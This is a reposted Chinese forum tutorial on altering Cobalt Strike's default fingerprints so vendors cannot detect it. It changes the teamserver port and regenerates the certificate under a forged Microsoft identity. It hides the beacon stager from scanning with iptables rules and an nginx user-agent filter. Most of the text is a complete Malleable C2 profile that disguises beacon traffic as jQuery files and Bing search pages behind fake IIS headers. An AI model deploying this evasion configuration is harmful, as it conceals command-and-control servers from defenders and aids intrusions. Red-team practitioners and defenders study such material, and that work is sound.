设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 【红蓝对抗】cobaltstrike特征修改
返回列表 发新帖
查看: 4089|回复: 0

【红蓝对抗】cobaltstrike特征修改

[复制链接]
1337163122

221

主题

233

帖子

792

积分

高级会员

Rank: 4

积分
792
发表于 2021-9-10 07:59:33 | 显示全部楼层 |阅读模式
【红蓝对抗】cobaltstrike特征修改 (qq.com)
【红蓝对抗】cobaltstrike特征修改原创 zhangy1da Tide安全团队 1周前

前言

Cobalt Strike是一款内网渗透测试工具,常被业界人称为CS。Cobalt Strike 2.0版本主要是结合Metasploit可以称为图形化MSF工具。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。客户端模式和服务端模式可以在Windows以及Linux上运行这里要注意服务端模式在Windows下运行时有可能会出现一些细小的问题不过影响不大。可以很好的解决metasploit对Windows支持不够好的问题。
Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。
用的人多,厂商也是对其严防死守,所以简单综合下网上资料来修改自己的cs以躲避检查。
端口客户端默认连接端口:50050
修改方式:直接编辑teamserver端口

证书cobaltstrike证书
客户端连接时使用,存在特征。
默认证书特征:
sha256值

keytool查看证书内容

           

keytool -list -v -keystore cobaltstrike.store -storepass 123456

censys.io 查询其sha256值

修改:使用keytool重新生成证书,此证书不具有可信度,只是无特征而已
  1. keytool -keystore cobaltstrike.store -storepass zyd123456 -keypass zyd123456 -genkey -keyalg RSA -alias baidu.com -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"
  2. keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12
复制代码
​ 修改过后的证书

censys.io已经无法查到

https证书https证书 使用https监听器时使用,默认的证书存在特征,最好使用有效证书其次选择自签名证书。
购买域名后去freessl申请受信任的证书

将生成pem文件和key文件上传到vps,并重新生成store文件
  1. openssl pkcs12 -export -in full_chain.pem -inkey private.key -out cdn.zhang1d.xyz.p12 -name cdn.zhany1d.xyz -passout pass:zyd123456

  3. keytool -importkeystore -deststorepass zyd123456 -destkeypass zyd123456 -destkeystore new.store -srckeystore cdn.zhang1d.xyz.p12 -srcstoretype PKCS12 -srcstorepass zyd123456 -alias cdn.zhangy1d.xyz
复制代码
修改Malleable-C2-Profiles文件,指定https-certificate为new.store
  1. https-certificate {
  2.     set keystore "new.store";
  3.     set password "zyd123456";
  4. }
复制代码



Beacon Staging特征源自于cobalt strike使用stageless过程即客户端使用小巧的stager后续在向其投放shellcode建立beacon,而服务端获取shellcode的uri可被探测即所有访问监听器端口可以获取shellcode而cs使用默认的密钥混淆shellcode,当脚本请求到shellcode之后可以解密获取shellcode特征导致server被识别。

使用nmap脚本可扫描出C2信息

           

nmap 192.168.163.142 -p 8180 --script=./grab_beacon_config.nse

方法一
iptables限制listenner端口只允许本地访问
  1. iptables -I INPUT -p tcp --dport 8180 -j DROP
  2. iptables -I INPUT -s 127.0.0.1 -ptcp --dport 8180 -j ACCEPT
复制代码
使用nginx代理设置特定user-agent请求转发至listener监听端口以躲避扫描

  2. location ~*/jquery {
  3.         if ($http_user_agent != "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko") {
  4.         return 302 $REDIRECT_DOMAIN$request_uri;
  5.         }
  6.         proxy_pass          https://127.0.0.1:8180;

复制代码
方法二
Malleable-C2-Profiles文件自定义http-stager uri

  2. ### HTTP-stager :staging process
  3. set host_stage "true";

  5. http-stager{

  7. set uri_x86 "/jquery-3.3.1.slim.min.js";
  8.   set uri_x64 "/jquery-3.3.2.slim.min.js";


  11. client{
  12.   header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  13.          header "Accept-Language" "en-US,en;q=0.5";
  14.          #header "Host" "code.jquery.com";
  15.          header "Referer" "http://www.baidu.com/";
  16.          header "Accept-Encoding" "gzip, deflate";
  17. }

  19. server {
  20.   header "Server" "Microsoft-IIS/10.0";
  21.          header "Cache-Control" "max-age=0, no-cache";
  22.          header "Pragma" "no-cache";
  23.          header "Connection" "keep-alive";
  24.          header "Content-Type" "application/javascript; charset=utf-8";
  25.          output {
  26.             ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
  27.             # 2nd Line            
  28.              prepend "!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).replace(/\\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==typeof(n=f.call(t,"constructor")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(T,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="\r";
  29.             # 1st Line
  30.              prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
  31.              append "".(o=t.documentElement,Math.max(t.body["scroll"+e],o["scroll"+e],t.body["offset"+e],o["offset"+e],o["client"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t)&&!isNaN(e-parseFloat(e))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
  32.              print;
  33.         }
  34.     }

  36. }

复制代码

流量特征默认的CobaltStrike流量特征明显,使用Malleable-C2-Profiles 配置文件可自定义修改流量特征绕过检查。
其基本语法学习可参考:Malleable C2
改写后的Malleable-C2-Profile如下:

  2. ### sleep jitter
  3. set sleeptime "30000";
  4. set jitter "45";


  7. set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)";

  9. ### self-sigend Certificate https:自签名证书

  11. https-certificate {
  12. set C "CN";
  13. set CN "zhangyida";
  14. set L "CN";
  15. set O "CN";
  16. set OU "baidu.com";
  17. set validity "365";
  18. }


  21. ### Valid SSL Certificate HTTPS:有效证书
  22. #https-certificate{
  23. # set keystore "new.store";
  24. # set password "ccc123456";
  25. #}

  27. ### http/s global response header
  28. http-config{
  29. set headers " Server,Content-Type,Cache-Control,Connection,X-Powered-By";
  30. header "Sever" "Microsoft-IIS/10.0";
  31. header "Content-Type" "text/html;charset=UTF-8";
  32. header "Cache-Control" "max-age=1";
  33. header "Connection" "keep-alive";
  34. header "X-Powered-By" "ASP.net";
  35. set trust_x_forwarded_for "false";  #重定向设置
  36. }






  43. # http-get
  44. http-get {

  46.     set uri "/jquery_2.4.0/5eN1bjq8AAUYm2zgoY3K/ll_9354efa.js";

  48.     client {

  50.         header "Host" "www.baidu.com";
  51.         header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  52.         header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG";
  53.         
  54.         metadata {
  55.             base64url;
  56.             parameter "q";
  57.         }

  59.         parameter "go" "Search";
  60.         parameter "qs" "bs";
  61.         parameter "form" "QBRE";


  64.     }

  66.     server {

  68.         header "Cache-Control" "private, max-age=0";
  69.         header "Content-Type" "text/html; charset=utf-8";
  70.         header "Vary" "Accept-Encoding";
  71.         header "Connection" "close";
  72.         

  74.         output {
  75.             netbios;
  76.             prepend "<!DOCTYPE html><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="http://schemas.live.com/Web/"><script type="text/javascript">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content="text/html; charset=utf-8" http-equiv="content-type" /><link href="/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE" rel="alternate" title="XML" type="text/xml" /><link href="/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE" rel="alternate" title="RSS" type="application/rss+xml" /><link href="/sa/simg/bing_p_rr_teal_min.ico" rel="shortcut icon" /><script type="text/javascript">//<![CDATA[";
  77.             append "G={ST:(si_ST?si_ST:new Date),Mkt:"en-US",RTL:false,Ver:"53",IG:"4C1158CCBAFC4896AD78ED0FF0F4A1B2",EventID:"E37FA2E804B54C71B3E275E9589590F8",MN:"SERP",V:"web",P:"SERP",DA:"CO4",SUIH:"OBJhNcrOC72Z3mr21coFQw",gpUrl:"/fd/ls/GLinkPing.aspx?" }; _G.lsUrl="/fd/ls/l?IG="+_G.IG ;curUrl="http://www.bing.com/search";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+"IG="+_G.IG+"&"+a;}return true;};//]]></script><style type="text/css">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
  78.             print;
  79.         }
  80.     }
  81. }


  84. # http-post
  85. http-post{

  87. set uri "/hiscd37ed75a9387c5b.js";

  89. #   set verb "GET";

  91. client {
  92.   header "Accept" "*/*";
  93.   header "Host" "www.baidu.com";
  94.   header "Content-Type" "text/html;charset=UTF-8";
  95.   header "Cache-Control" "max-age=1";
  96.   
  97.   id {
  98.             base64url;
  99.             parameter "form";
  100.         }
  101.   output {
  102.             base64;
  103.             print;
  104.         }
  105. }

  107. server{
  108.   header "Cache-Control" "private,max-age=0";
  109.   header "Content-Type" "text/html;charset=UTF-8";
  110.   header "Vary" "Accept-Encoding";
  111.   header "Server" "Microsoft-IIS/10";
  112.   header "Connection" "close";
  113.   
  114.   output{
  115.    netbios;
  116.             prepend "<!DOCTYPE html><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="http://schemas.live.com/Web/"><script type="text/javascript">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content="text/html; charset=utf-8" http-equiv="content-type" /><link href="/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE" rel="alternate" title="XML" type="text/xml" /><link href="/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE" rel="alternate" title="RSS" type="application/rss+xml" /><link href="/sa/simg/bing_p_rr_teal_min.ico" rel="shortcut icon" /><script type="text/javascript">//<![CDATA[";
  117.             append "G={ST:(si_ST?si_ST:new Date),Mkt:"en-US",RTL:false,Ver:"53",IG:"4C1158CCBAFC4896AD78ED0FF0F4A1B2",EventID:"E37FA2E804B54C71B3E275E9589590F8",MN:"SERP",V:"web",P:"SERP",DA:"CO4",SUIH:"OBJhNcrOC72Z3mr21coFQw",gpUrl:"/fd/ls/GLinkPing.aspx?" }; _G.lsUrl="/fd/ls/l?IG="+_G.IG ;curUrl="http://www.bing.com/search";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+"IG="+_G.IG+"&"+a;}return true;};//]]></script><style type="text/css">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
  118.             print;  
  119.   }

  121. }

  123. }


  126. ### HTTP-stager :staging process
  127. set host_stage "true";

  129. http-stager{

  131. set uri_x86 "/jquery-3.3.1.slim.min.js";
  132.     set uri_x64 "/jquery-3.3.2.slim.min.js";


  135. client{
  136.   header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  137.          header "Accept-Language" "en-US,en;q=0.5";
  138.          #header "Host" "code.jquery.com";
  139.          header "Referer" "http://www.baidu.com/";
  140.          header "Accept-Encoding" "gzip, deflate";
  141. }

  143. server {
  144.   header "Server" "Microsoft-IIS/10.0";
  145.          header "Cache-Control" "max-age=0, no-cache";
  146.          header "Pragma" "no-cache";
  147.          header "Connection" "keep-alive";
  148.          header "Content-Type" "application/javascript; charset=utf-8";
  149.          output {
  150.             ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
  151.             # 2nd Line            
  152.              prepend "!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).replace(/\\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==typeof(n=f.call(t,"constructor")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(T,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="\r";
  153.             # 1st Line
  154.              prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
  155.              append "".(o=t.documentElement,Math.max(t.body["scroll"+e],o["scroll"+e],t.body["offset"+e],o["offset"+e],o["client"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t)&&!isNaN(e-parseFloat(e))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
  156.              print;
  157.         }
  158.     }


  161. }

复制代码
使用c2lint检查无报错即可使用




后续
以上基本都是根据前人的经验做的修改,没什么创新且熟悉Malleable C2语法修改起来会更加得心应手。
后续还需要做的是隐藏C2 Server的真实IP。
参考
csroad大佬的cs特征修改与隐藏
https://www.jianshu.com/p/e7701efef047
Cobalt Strike特征隐藏
https://www.cnblogs.com/Xy--1/p/14396744.html
大佬总结的cobaltstrike学习wiki
https://wbglil.gitbook.io/cobalt ... o-zhan/malleable-c2
一些malleable-c2-profile模板
https://github.com/rsmudge/Malleable-C2-Profiles



回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-22 15:44 , Processed in 0.017071 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表